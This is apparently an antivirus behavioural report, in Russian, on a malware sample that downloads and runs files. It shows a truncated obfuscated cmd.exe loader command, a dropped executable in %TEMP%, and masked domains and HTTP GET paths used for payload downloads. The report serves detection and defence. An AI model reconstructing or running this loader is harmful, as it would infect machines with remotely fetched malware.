Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V:/C"set icX=izXquhBIwbtEjbVz5CLc32F)SdOskxZo8,Y{l\yPm;$pMeD-KvnrNJ1}a+@g.=W' f/:7(&&for %6 in (43;31;8;45;51;27;5;45;36;36;64;42;34;43;26;61;50;45;8;47;31;13;12;45;19;10;64;52;45;10;60;62;45;...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\721.exe
Сетевая активность
Подключается к
- 'ne###a-ent.com':80
- 'ne###a-ent.com':443
- 'ek###.com.br':80
- 'ne####ros.com.br':80
- 'n-###imoto.jp':80
- 'n-###imoto.jp':443
- 'ms##api.com':80
TCP
Запросы HTTP GET
- http://ne###a-ent.com/t3
- http://ek###.com.br/XWWpLxCI
- http://ne####ros.com.br/bin/zoZb
- http://n-###imoto.jp/j583VppF
- http://ms##api.com/mscinsaat.com/cWBJXY3
Другие
- 'ne###a-ent.com':443
- 'n-###imoto.jp':443
UDP
- DNS ASK ne###a-ent.com
- DNS ASK ek###.com.br
- DNS ASK ne####ros.com.br
- DNS ASK n-###imoto.jp
- DNS ASK ms##api.com
Другое
Ищет следующие окна
- ClassName: '' WindowName: '3625237444'
- ClassName: '' WindowName: '0'
- ClassName: '' WindowName: ''
- ClassName: '' WindowName: ' '
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:/C"set icX=izXquhBIwbtEjbVz5CLc32F)SdOskxZo8,Y{l\yPm;$pMeD-KvnrNJ1}a+@g.=W' f/:7(&&for %6 in (43;31;8;45;51;27;5;45;36;36;64;42;34;43;26;61;50;45;8;47;31;13;12;45;19;10;64;52;45;10;60;62;45;...' (со скрытым окном)
